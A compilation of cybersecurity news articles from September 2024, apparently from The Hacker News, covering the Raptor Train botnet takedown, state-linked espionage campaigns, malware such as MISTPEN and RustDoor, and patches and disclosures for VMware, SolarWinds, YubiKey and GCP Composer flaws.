The infrastructure powering the botnet is estimated to have ensnared hundreds of thousands of devices since its formation, with the network powered by a three-tiered architecture consisting of the following -
Tier 1: Compromised SOHO/IoT devices
Tier 2: Exploitation servers, payload servers, and command-and-control (C2) servers
Tier 3: Centralized management nodes and a cross-platform Electron application front-end referred to as Sparrow (aka Node Comprehensive Control Tool, or NCCT)
The way it works is, that bot tasks are initiated from Tier 3 "Sparrow" management nodes, which are then routed through the appropriate Tier 2 C2 servers, and subsequently sent to the bots themselves in Tier 1, which makes up a huge chunk of the botnet.
Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel.
A majority of the Tier 1 nodes have been geolocated to the U.S., Taiwan, Vietnam, Brazil, Hong Kong, and Turkey. Each of these nodes has an average lifespan of 17.44 days, indicating the threat actor's ability to reinfect the devices at will.
"In most cases, the operators did not build in a persistence mechanism that survives through a reboot," Lumen noted.
"The confidence in re-exploitability comes from the combination of a vast array of exploits available for a wide range of vulnerable SOHO and IoT devices and an enormous number of vulnerable devices on the Internet, giving Raptor Train somewhat of an 'inherent' persistence."
The nodes are infected by an in-memory implant tracked as Nosedive, a custom variant of the Mirai botnet, via Tier 2 payload servers explicitly set up for this purpose. The ELF binary comes with capabilities to execute commands, upload and download files, and mount DDoS attacks.
Tier 2 nodes, on the other hand, are rotated about every 75 days and are primarily based in the U.S., Singapore, the U.K., Japan, and South Korea. The number C2 nodes has increased from approximately 1-5 between 2020 and 2022 to no less than 60 between June 2024 and August 2024.
These nodes are flexible in that they also act as exploitation servers to co-opt new devices into the botnet, payload servers, and even facilitate reconnaissance of targeted entities.
At least four different campaigns have been linked to the ever-evolving Raptor Train botnet since mid-2020, each of which are distinguished by the root domains used and the devices targeted -
Crossbill (from May 2020 to April 2022) - use of the C2 root domain k3121.com and associated subdomains
Finch (from July 2022 to June 2023) - use of the C2 root domain b2047.com and associated C2 subdomains
Canary (from May 2023 to August 2023) - use of the C2 root domain b2047.com and associated C2 subdomains, while relying on multi-stage droppers
Oriole (from June 2023 to September 2024) - use of the C2 root domain w8510.com and associated C2 subdomains
The Canary campaign, which heavily targeted ActionTec PK5000 modems, Hikvision IP cameras, Shenzhen TVT NVRs, and ASUS routers, is notable for employing a multi-layered infection chain of its own to download a first-stage bash script, which connects to a Tier 2 payload server to retrieve Nosedive and a second-stage bash script.
The new bash script, in turn, attempts to download and execute a third-stage bash script from the payload server every 60 minutes.
"In fact, the w8510.com C2 domain for [the Oriole] campaign became so prominent amongst compromised IoT devices, that by June 3, 2024, it was included in the Cisco Umbrella domain rankings," Lumen said.
"By at least August 7, 2024, it was also included in Cloudflare Radar's top 1 million domains. This is a concerning feat because domains that are in these popularity lists often circumvent security tools via domain whitelisting, enabling them to grow and maintain access and further avoid detection."
No DDoS attacks emanating from the botnet have been detected to date, although evidence shows that it has been weaponized to target U.S. and Taiwanese entities in the military, government, higher education, telecommunications, defense industrial base (DIB) and information technology (IT) sectors.
What's more, bots entangled within Raptor Train have likely carried out possible exploitation attempts against Atlassian Confluence servers and Ivanti Connect Secure (ICS) appliances in the same verticals, suggesting widespread scanning efforts.
The links to Flax Typhoon – a hacking crew with a track record of targeting entities in Taiwan, Southeast Asia, North America, and Africa – stem from overlaps in the victimology footprint, Chinese language use, and other tactical similarities.
"This is a robust, enterprise-grade control system used to manage upwards of 60 C2 servers and their infected nodes at any given time," Lumen said.
"This service enables an entire suite of activities, including scalable exploitation of bots, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based distributed denial of service (DDoS) attacks at-scale."
FBI Dismantles Massive Flax Typhoon Botnet#
The U.S. Department of Justice (DoJ) on Wednesday announced the takedown of the Raptor Train botnet pursuant to a court-authorized law enforcement operation. It also attributed the Flax Typhoon threat actor to a publicly-traded, Beijing-based company known as Integrity Technology Group.
"The malware connected these thousands of infected devices into a botnet, controlled by Integrity Technology Group, which was used to conduct malicious cyber activity disguised as routine internet traffic from the infected consumer devices," the DoJ said.
The operation saw the attackers' infrastructure seized to issue disabling commands to the malware on infected devices, despite unsuccessful efforts made by the threat actors to interfere with the remediation action through a DDoS attack targeting the servers the Federal Bureau of Investigation (FBI) was using to carry out the court order.
"The company built an online application allowing its customers to log in and control specified infected victim devices, including with a menu of malicious cyber commands using a tool called 'vulnerability-arsenal,'" the DoJ said. "The online application was prominently labeled 'KRLab,' one of the main public brands used by Integrity Technology Group."
The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America (135,300), Europe (65,600), Asia (50,400), Africa (9,200), and Oceania (2,400), and South America (800).
In total, more than 1.2 million records of compromised devices have been identified in a MySQL database hosted on a Tier 3 management server used to administer and control the botnet and C2 servers by means of the Sparrow application. Sparrow also contains a module to exploit computer networks through an arsenal of known and zero-day flaws.
Botnets like KV-Botnet and Raptor Train make for ideal proxies as they can be abused by the threat actors to conceal their identities while staging DDoS attacks or compromising targeted networks. They also tend to evade network security defenses given that the malicious activity is originating from IP addresses with good reputations.
"The Chinese government is going to continue to target your organizations and our critical infrastructure — either by their own hand or concealed through their proxies," FBI director Christopher Wray said, calling out Integrity Technology Group for carrying out intelligence gathering and reconnaissance for Chinese government security agencies.
"Ultimately, as part of this operation, we were able to identify thousands of infected devices, and, then, with court authorization, issued commands to remove the malware from them, prying them from China's grip."
Chinese Engineer Charged in U.S. for Years-Long Cyber Espionage Targeting NASA and Military
19.9.24 APT The Hacker News
A Chinese national has been indicted in the U.S. on charges of conducting a "multi-year" spear-phishing campaign to obtain unauthorized access to computer software and source code created by the National Aeronautics and Space Administration (NASA), research universities, and private companies.
Song Wu, 39, has been charged with 14 counts of wire fraud and 14 counts of aggravated identity theft. If convicted, he faces a maximum sentence of a jail term of 20 years for each count of wire fraud and a two-year consecutive sentence in prison for aggravated identity theft.
He was employed as an engineer at the Aviation Industry Corporation of China (AVIC), a Chinese state-owned aerospace and defense conglomerate founded in 2008 and headquartered in Beijing.
According to information listed on AVIC's website, it has "over 100 subsidiaries, nearly 24 listed companies, and more than 400,000 employees." In November 2020 and June 2021, the company and some of its subsidiaries became the subject of U.S. sanctions, barring Americans from investing in the company.
Song is said to have carried out a spear-phishing campaign that involved creating email accounts to mimic U.S.-based researchers and engineers, which were then utilized to obtain specialized restricted or proprietary software for aerospace engineering and computational fluid dynamics.
The software could also be used for industrial and military applications, including the development of advanced tactical missiles and aerodynamic design and assessment of weapons.
These emails, the U.S. Department of Justice (DoJ) alleged, were sent to employees at NASA, the U.S. Air Force, Navy, and Army, and the Federal Aviation Administration, as well as individuals employed in major research universities in Georgia, Michigan, Massachusetts, Pennsylvania, Indiana, and Ohio.
The social engineering attempts, which started around January 2017 and continued through December 2021, also targeted private sector companies that work in the aerospace field.
The fraudulent messages purported to be sent by a colleague, associate, friend, or other people in the research or engineering community, requesting prospective targets to send or make available source code or software that they had access to. The DoJ did not disclose the name of the software or the defendant's current whereabouts.
"Once again, the FBI and our partners have demonstrated that cyber criminals around the world who are seeking to steal our companies' most sensitive and valuable information can and will be exposed and held accountable," said Keri Farley, Special Agent in Charge of FBI Atlanta.
"As this indictment shows, the FBI is committed to pursuing the arrest and prosecution of anyone who engages in illegal and deceptive practices to steal protected information."
Coinciding with the indictment, the DoJ also unsealed a separate indictment against Chinese national Jia Wei, a member of the People's Liberation Army (PLA), for infiltrating an unnamed U.S.-based communications company in March 2017 to steal proprietary information relating to civilian and military communication devices, product development, and testing plans.
"During his unauthorized access, Wei and his co-conspirators attempted to install malicious software designed to provide persistent unauthorized access to the U.S. company's network," the DoJ said. "Wei's unauthorized access continued until approximately late May 2017."
The development comes weeks after the U.K. National Crime Agency (NCA) announced that three men, Callum Picari, 22; Vijayasidhurshan Vijayanathan, 21; and Aza Siddeeque, 19, pleaded guilty to running a website that enabled cybercriminals to bypass banks' anti-fraud checks and take control of bank accounts.
The service, named OTP.agency, allowed monthly subscribers to socially engineer bank account holders into disclosing genuine one-time-passcodes, or reveal their personal information.
The underground service is said to have targeted over 12,500 members of the public between September 2019 and March 2021, when it was taken offline after the trio were arrested. It's currently not known how much illegal revenue the operation generated during its lifespan.
"A basic package costing £30 a week allowed multi-factor authentication to be bypassed on platforms such as HSBC, Monzo, and Lloyds so that criminals could complete fraudulent online transactions," the NCA said. "An elite plan cost £380 a week and granted access to Visa and Mastercard verification sites."
North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware
18.9.24 APT The Hacker News
A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).
The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).
The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.
"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.
"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."
The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.
In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.
It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.
This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.
It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.
"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."
TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.
Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.
"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.
Chrome Introduces One-Time Permissions and Enhanced Safety Check for Safer Browsing
18.9.24 Safety The Hacker News
Google has announced that it's rolling out a new set of features to its Chrome browser that gives users more control over their data when surfing the internet and protects them against online threats.
"With the newest version of Chrome, you can take advantage of our upgraded Safety Check, opt out of unwanted website notifications more easily and grant select permissions to a site for one time only," the tech giant said.
The improvements to Safety Check allow it to run automatically in the background, notifying users of the actions it has taken, such as revoking permissions for websites they no longer visit, and flagging potentially unwanted notifications.
It's also designed to notify users of security issues that need to be addressed, while automatically revoking notification permissions from suspicious sites identified by Google Safe Browsing.
"On Desktop, Safety Check will continue to notify you if you have any Chrome extensions installed that may pose a security risk to you, then bring you to the extensions page and show a summary panel with quick controls to remove them," Andrew Kamau, product manager of Chrome, said,
Safety Check, besides offering users the option to enable Google Safe Browsing protections, is also capable of warning if a username or password stored in the Google Password Manager was involved in a data breach, the search and advertising company added.
Chrome Safer Browsing
Some of the other key updates include the ability to unsubscribe from unwanted website notifications directly on the notifications drawer on both Pixel and Android devices, as well as grant one-time permissions for Chrome on Android and Desktop.
"With this feature, you can choose to grant select permissions — such as access to your camera or mic — to a site for one time only, helping you better manage your online privacy," Kamau said. "Once you leave the site, Chrome will revoke the permissions. The site won't be able to use those permissions until you explicitly grant them again."
GSMA Plans End-to-End Encryption for Cross-Platform RCS Messaging
18.9.24 Mobil The Hacker News
The GSM Association (GSMA), the governing body that oversees the development of the Rich Communications Services (RCS) protocol, on Tuesday, said it's working towards implementing end-to-end encryption (E2EE) to secure messages sent between the Android and iOS ecosystems.
"The next major milestone is for the RCS Universal Profile to add important user protections such as interoperable end-to-end encryption," Tom Van Pelt, technical director of GSMA, said.
"This will be the first deployment of standardized, interoperable messaging encryption between different computing platforms, addressing significant technical challenges such as key federation and cryptographically-enforced group membership."
The development comes a day after Apple officially rolled out iOS 18 with support for RCS in its Messages app, which comes with advanced features like message reactions, typing indications, read receipts, and high-quality media sharing, among others.
RCS, an improvement over the current SMS standard, is currently not end-to-end encrypted out of the box, prompting Google to implement the Signal protocol to secure RCS conversations on Android.
Earlier this year, Apple said it will work with GSMA members to integrate encryption. It's worth noting that the company's proprietary iMessage service is E2EE enabled.
"We look forward to continuing to collaborate across the mobile ecosystem to advance the RCS standard with interoperable end-to-end encryption to keep all RCS messages private and secure," Van Pelt said.
Google, last July, also revealed plans for baking the Message Layer Security (MLS) protocol to its Messages app for Android in order to facilitate interoperability across messaging services and platforms.
As recently as this month, Meta detailed its approach to enable interoperability with third-party messaging services in WhatsApp and Facebook Messenger as part of its efforts to comply with the E.U. Digital Markets Act (DMA) while maintaining E2EE guarantees "as far as possible."
"Building third-party chats is technically challenging and preserving privacy and security is a shared responsibility," the social media company said. "We have already come a long way, but there is a lot more to build."
Patch Issued for Critical VMware vCenter Flaw Allowing Remote Code Execution
18.9.24 Vulnerebility The Hacker News
Broadcom on Tuesday released updates to address a critical security flaw impacting VMware vCenter Server that could pave the way for remote code execution.
The vulnerability, tracked as CVE-2024-38812 (CVSS score: 9.8), has been described as a heap-overflow vulnerability in the DCE/RPC protocol.
"A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution," the virtualization services provider said in a bulletin.
The shortcoming is similar to two other remote code execution flaws, CVE-2024-37079 and CVE-2024-37080 (CVSS scores: 9.8), that VMware resolved in vCenter Server in June 2024.
Also addressed by VMware is a privilege escalation flaw in the vCenter Server (CVE-2024-38813, CVSS score: 7.5) that could enable a malicious actor with network access to the instance to escalate privileges to root by sending a specially crafted network packet.
Security researchers zbl and srs of team TZL have been credited with discovering and reporting the two flaws during the Matrix Cup cybersecurity competition held in China back in June 2024. They have been fixed in the below versions -
vCenter Server 8.0 (Fixed in 8.0 U3b)
vCenter Server 7.0 (Fixed in 7.0 U3s)
VMware Cloud Foundation 5.x (Fixed in 8.0 U3b as an asynchronous patch)
VMware Cloud Foundation 4.x (Fixed in 7.0 U3s as an asynchronous patch)
Broadcom said it's not aware of malicious exploitation of the two vulnerabilities, but has urged customers to update their installations to the latest versions to safeguard against potential threats.
"These vulnerabilities are memory management and corruption issues which can be used against VMware vCenter services, potentially allowing remote code execution," the company said.
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory urging organizations to work towards eliminating cross-site scripting (XSS) flaws that threat actors could exploit to breach systems.
"Cross-site scripting vulnerabilities arise when manufacturers fail to properly validate, sanitize, or escape inputs," the government bodies said. "These failures allow threat actors to inject malicious scripts into web applications, exploiting them to manipulate, steal, or misuse data across different contexts."
Google Chrome Switches to ML-KEM for Post-Quantum Cryptography Defense
17.9.24 Safety The Hacker News
Google has announced that it will be switching from KYBER to ML-KEM in its Chrome web browser as part of its ongoing efforts to defend against the risk posed by cryptographically relevant quantum computers (CRQCs).
"Chrome will offer a key share prediction for hybrid ML-KEM (codepoint 0x11EC)," David Adrian, David Benjamin, Bob Beck, and Devon O'Brien of the Chrome Team said. "The PostQuantumKeyAgreementEnabled flag and enterprise policy will apply to both Kyber and ML-KEM."
The changes are expected to take effect in Chrome version 131, which is on track for release in early November 2024. Google noted that the two hybrid post-quantum key exchange approaches are essentially incompatible with each other, prompting it to abandon KYBER.
"The changes to the final version of ML-KEM make it incompatible with the previously deployed version of Kyber," the company said. "As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519."
The development comes shortly after the U.S. National Institute of Standards and Technology (NIST) published the final versions of the three new encryption algorithms — to secure current systems against future attacks using quantum technologies, marking the culmination of an eight-year effort from the agency.
The algorithms in question are FIPS 203 (aka ML-KEM), FIPS 204 (aka CRYSTALS-Dilithium or ML-DSA), and FIPS 205 (aka Sphincs+ or SLH-DSA) are meant for general encryption and protecting digital signatures. A fourth algorithm, FN-DSA (originally called FALCON), is slated for finalization later this year.
ML-KEM, short for Module-Lattice-based Key-Encapsulation Mechanism, is derived from the round-three version of the CRYSTALS-KYBER KEM and can be used to establish a shared secret key between two parties communicating over a public channel.
Microsoft, for its part, is also readying for a post-quantum world by announcing an update to its SymCrypt cryptographic library with support for ML-KEM and eXtended Merkle Signature Scheme (XMSS).
"Adding post-quantum algorithm support to the underlying crypto engine is the first step towards a quantum safe world," the Windows maker said, stating the transition to post-quantum cryptography (PQC) is a "complex, multi-year and iterative process" that requires careful planning.
The disclosure also follows the discovery of a cryptographic flaw in the Infineon SLE78, Optiga Trust M, and Optiga TPM security microcontrollers that could allow for the extraction of Elliptic Curve Digital Signature Algorithm (ECDSA) private keys from YubiKey hardware authentication devices.
The cryptographic flaw within the Infineon-supplied library is believed to have remained unnoticed for 14 years and about 80 highest-level Common Criteria certification evaluations.
The side-channel attack, dubbed EUCLEAK (CVE-2024-45678, CVSS score: 4.9) by NinjaLab's Thomas Roche, affects all Infineon security microcontrollers embedding the cryptographic library and the following YubiKey devices -
YubiKey 5 Series versions prior to 5.7
YubiKey 5 FIPS Series prior to 5.7
YubiKey 5 CSPN Series prior to 5.7
YubiKey Bio Series versions prior to 5.7.2
Security Key Series all versions prior to 5.7
YubiHSM 2 versions prior to 2.4.0
YubiHSM 2 FIPS versions prior to 2.4.0
"The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target, and specialized equipment to perform the necessary attack," Yubico, the company behind YubiKey, said in a coordinated advisory.
"Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or [YubiHSM] authentication key."
But because existing YubiKey devices with vulnerable firmware versions can't be updated – an intentional design choice meant to maximize security and avoid introducing new vulnerabilities – they are permanently susceptible to EUCLEAK.
The company has since announced plans to deprecate support for Infineon's cryptographic library in favor of its own cryptographic library as part of firmware versions YubiKey f5.7 and YubiHSM 2.4.
A similar side-channel attack against Google Titan security keys was demonstrated by Roche and Victor Lomne in 2021, potentially allowing malicious actors to clone the devices by exploiting an electromagnetic side-channel in the chip embedded in them.
"The [EUCLEAK] attack requires physical access to the secure element (few local electromagnetic side-channel acquisitions, i.e. few minutes, are enough) in order to extract the ECDSA secret key," Roche said. "In the case of the FIDO protocol, this allows to create a clone of the FIDO device."
U.S. Treasury Sanctions Executives Linked to Intellexa Predator Spyware Operation
17.9.24 BigBrothers The Hacker News
The U.S. Department of Treasury has imposed fresh sanctions against five executives and one entity with ties to the Intellexa Consortium for their role in the development, operation, and distribution of a commercial spyware called Predator.
"The United States will not tolerate the reckless propagation of disruptive technologies that threatens our national security and undermines the privacy and civil liberties of our citizens," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence, Bradley T. Smith.
"We will continue to hold accountable those that seek to enable the proliferation of exploitative technologies, while also encouraging the responsible development of technologies that align with international standards."
The sanctioned individuals and entities are listed below -
Felix Bitzios, the beneficial owner of an Intellexa Consortium company that's believed to have supplied Predator to a foreign government client and the manager of Intellexa S.A.
Andrea Nicola Constantino Hermes Gambazzi, the beneficial owner of Thalestris Limited and Intellexa Limited, which are both members of the Intellexa Consortium
Merom Harpaz, a top executive of the Intellexa Consortium and the manager of Intellexa S.A.
Panagiota Karaoli, director of multiple Intellexa Consortium entities that are controlled by or are a subsidiary of Thalestris Limited
Artemis Artemiou, an employee of Intellexa S.A., as well as the general manager and member of the board of Cytrox Holdings, another member of the Intellexa Consortium
Aliada GroupInc., a British Virgin Islands-based company and member of the Intellexa Consortium has facilitated tens of millions of dollars of transactions
Thalestris Limited has been involved in processing transactions on behalf of other entities within the Intellexa Consortium, the Treasury said, adding that Aliada Group is directed by Tal Jonathan Dilian, the founder of the Intellexa Consortium.
The department described the consortium as a "complex international web of decentralized companies that built and commercialized a comprehensive suite of highly invasive spyware products."
The development comes a little over six months after the Treasury sanctioned Dilian, Sara Aleksandra Fayssal Hamou, and five other entities, including Intellexa S.A., on similar grounds.
It also follows a resurgence of Predator spyware activity after a period of relative silence by likely customers in Angola, the Democratic Republic of the Congo (DRC), and Saudi Arabia using new infrastructure that's designed to evade detection.
"The latest evolution of Predator infrastructure includes an additional tier in its delivery infrastructure to improve customer anonymization and enhanced operational security in its server configurations and associated domains," Recorded Future said.
"Although Predator spyware operators have changed significant aspects of their infrastructure setup, including changes that make country-specific attribution more challenging, they have largely retained their mode of operation."
It also follows Apple's decision to file a motion to dismiss its lawsuit against NSO Group for reasons that court disclosures could endanger its efforts to combat spyware, that there are steps being taken to avoid sharing information related to the Pegasus spyware, and that the impact could be diluted as a result of an expanding spyware market with new emerging players.
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users
17.9.24 Cryptocurrency The Hacker News
Cryptocurrency exchange Binance is warning of an "ongoing" global threat that's targeting cryptocurrency users with clipper malware with the goal of facilitating financial fraud.
Clipper malware, also called ClipBankers, is a type of malware that Microsoft calls cryware, which comes with capabilities to monitor a victim's clipboard activity and steal sensitive data a user copies, including replacing cryptocurrency addresses with those under an attacker's control.
In doing so, digital asset transfers initiated on a compromised system are routed to a rogue wallet instead of the intended destination address.
"In clipping and switching, a cryware monitors the contents of a user's clipboard and uses string search patterns to look for and identify a string resembling a hot wallet address," the tech giant noted way back in 2022. "If the target user pastes or uses CTRL + V into an application window, the cryware replaces the object in the clipboard with the attacker's address."
Binance, in an advisory issued on September 13, 2024, said it has been tracking a widespread malware threat that intercepts data stored in the clipboard with an aim to swap out cryptocurrency wallet addresses.
"The issue has seen a notable spike in activity, particularly on August 27, 2024, leading to significant financial losses for affected users," the exchange said. "The malware is often distributed through unofficial apps and plugins, especially on Android and web apps, but iOS users should also remain vigilant."
There is evidence to suggest that these malicious apps are inadvertently installed by users when searching for software in their native languages or through unofficial channels, primarily due to restrictions in their countries.
The company also said it's taking steps to blocklist the attacker addresses to prevent further fraudulent transactions, and that it has notified affected users, advising them to check for signs of suspicious software or plugins.
Besides urging users to refrain from downloading software from unofficial sources, Binance is calling for exercising caution when it comes to installing apps and plugins and ensuring they are authentic.
Blockchain analytics firm Chainalysis revealed last month that aggregate illicit activity on-chain has dropped by nearly 20% year-to-date, although stolen funds inflows nearly doubled from $857 million to $1.58 billion.
"Scammers for the most part continue to pivot away from broad-based ponzi schemes to more targeted campaigns like pig butchering, work from home scams, drainers, or address poisoning," it said, adding it observed a "rise in the use of Chinese language marketplaces and laundering networks."
According to the U.S. Federal Bureau of Investigation (FBI), 2023 was a record year for cryptocurrency fraud, with total losses exceeding $5.6 billion, a 45% increase compared to the previous year.
"The exploitation of cryptocurrency was most pervasive in investment scams, where losses accounted for almost 71% of all losses related to cryptocurrency. Call center frauds, including tech/customer support scams and government impersonation scams, accounted for about 10% of losses associated to cryptocurrency," the FBI Internet Crime Complaint Center (IC3) said.
A vast majority of the losses with a cryptocurrency nexus originated from the U.S., followed by Cayman Islands, Mexico, Canada, the U.K., India, Australia, Israel, Germany, and Nigeria.
SolarWinds Issues Patch for Critical ARM Vulnerability Enabling RCE Attacks
17.9.24 Vulnerebility The Hacker News
SolarWinds has released fixes to address two security flaws in its Access Rights Manager (ARM) software, including a critical vulnerability that could result in remote code execution.
The vulnerability, tracked as CVE-2024-28991, is rated 9.0 out of a maximum of 10.0 on the CVSS scoring system. It has been described as an instance of deserialization of untrusted data.
"SolarWinds Access Rights Manager (ARM) was found to be susceptible to a remote code execution vulnerability," the company said in an advisory. "If exploited, this vulnerability would allow an authenticated user to abuse the service, resulting in remote code execution."
Security researcher Piotr Bazydlo of the Trend Micro Zero Day Initiative (ZDI) has been credited with discovering and reporting the flaw on May 24, 2024.
The ZDI, which has assigned the shortcoming a CVSS score of 9.9, said it exists within a class called JsonSerializationBinder and stems from a lack of proper validation of user-supplied data, thus exposing ARM devices to a deserialization vulnerability that could then be abused to execute arbitrary code.
"Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed," the ZDI said.
Also addressed by SolarWinds is a medium-severity flaw in ARM (CVE-2024-28990, CVSS score: 6.3) that exposed a hard-coded credential which, if successfully exploited, could allow unauthorized access to the RabbitMQ management console.
Both the issues have been patched in ARM version 2024.3.1. Although there is currently no evidence of active exploitation of the vulnerabilities, users are recommended to update to the latest version as soon as possible to safeguard against potential threats.
The development comes as D-Link has resolved three critical vulnerabilities affecting DIR-X4860, DIR-X5460, and COVR-X1870 routers (CVE-2024-45694, CVE-2024-45695, and CVE-2024-45697, CVSS scores: 9.8) that could enable remote execution of arbitrary code and system commands.
Google Fixes GCP Composer Flaw That Could've Led to Remote Code Execution
16.9.24 Vulnerebility The Hacker News
A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.
The vulnerability has been codenamed CloudImposer by Tenable Research.
"The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool," security researcher Liv Matan said in a report shared with The Hacker News.
Dependency confusion (aka substitution attack), which was first documented by security researcher Alex Birsan in February 2021, refers to a type of software supply chain compromise in which a package manager is tricked into pulling a malicious package from a public repository instead of the intended file of the same name from an internal repository.
So, a threat actor could stage a large-scale supply chain attack by publishing a counterfeit package to a public package repository with the same name as a package internally developed by companies and with a higher version number.
This, in turn, causes the package manager to unknowingly download the malicious package from the public repository instead of the private repository, effectively replacing the existing package dependency with its rogue counterpart.
The problem identified by Tenable is similar in that it could be abused to upload a malicious package to the Python Package Index (PyPI) repository with the name "google-cloud-datacatalog-lineage-producer-client," which could then be preinstalled on all Composer instances with elevated permissions.
While Cloud Composer requires that the package in question is version-pinned (i.e., version 0.1.0), Tenable found that using the "--extra-index-url" argument during a "pip install" command prioritizes fetching the package from the public registry, thereby opening the door to dependency confusion.
Armed with this privilege, attackers could execute code, exfiltrate service account credentials, and move laterally in the victim's environment to other GCP services.
Following responsible disclosure on January 18, 2024, it was fixed by Google in May 2024 by ensuring that the package is only installed from a private repository. It has also added the extra precaution of verifying the package's checksum in order to confirm its integrity and validate that it has not been tampered with.
The Python Packaging Authority (PyPA) is said to have been aware of the risks posed by the "--extra-index-url" argument since at least March 2018, urging users to skip using PyPI in cases where the internal package needs to be pulled.
"Packages are expected to be unique up to name and version, so two wheels with the same package name and version are treated as indistinguishable by pip," a PyPA member noted at the time. "This is a deliberate feature of the package metadata, and not likely to change."
Google, as part of its fix, now also recommends that developers use the "--index-url" argument instead of the "–extra-index-url" argument and that GCP customers make use of an Artifact Registry virtual repository when requiring multiple repositories.
"The '--index-url' argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument," Matan said.
North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware
16.9.24 APT The Hacker News
Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by claiming to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
The malicious cyber activity is part of a multi-pronged campaign unleashed by cyber threat actors backed by the Democratic People's Republic of Korea (DPRK) to infiltrate networks of interest under the pretext of conducting interviews or coding assignments.
The financial and cryptocurrency sectors are among the top targets for the state-sponsored adversaries seeking to generate illicit revenues and meet an ever-evolving set of objectives based on the regime's interests.
These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory.
One of the notable indicators of North Korean social engineering activity relates to requests to execute code or download applications on company-owned devices, or devices that have access to a company's internal network.
Another aspect worth mentioning is that such attacks also involve "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."
Instances featuring such tactics have been extensively documented in recent weeks, underscoring a persistent evolution of the tools used in these campaigns against targets.
The latest attack chain detected by Jamf entails tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge that embeds within it bash commands to download two different second-stage payloads ("VisualStudioHelper" and "zsh_env") with identical functionality.
This stage two malware is RustDoor, which the company is tracking as Thiefbucket. As of writing, none of the anti-malware engines have flagged the zipped coding test file as malicious. It was uploaded to the VirusTotal platform on August 7, 2024.
"The config files embedded within the two separate malware samples shows that the VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki said.
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency firms. A subsequent analysis by S2W uncovered a Golang variant dubbed GateDoor that's meant for infecting Windows machines.
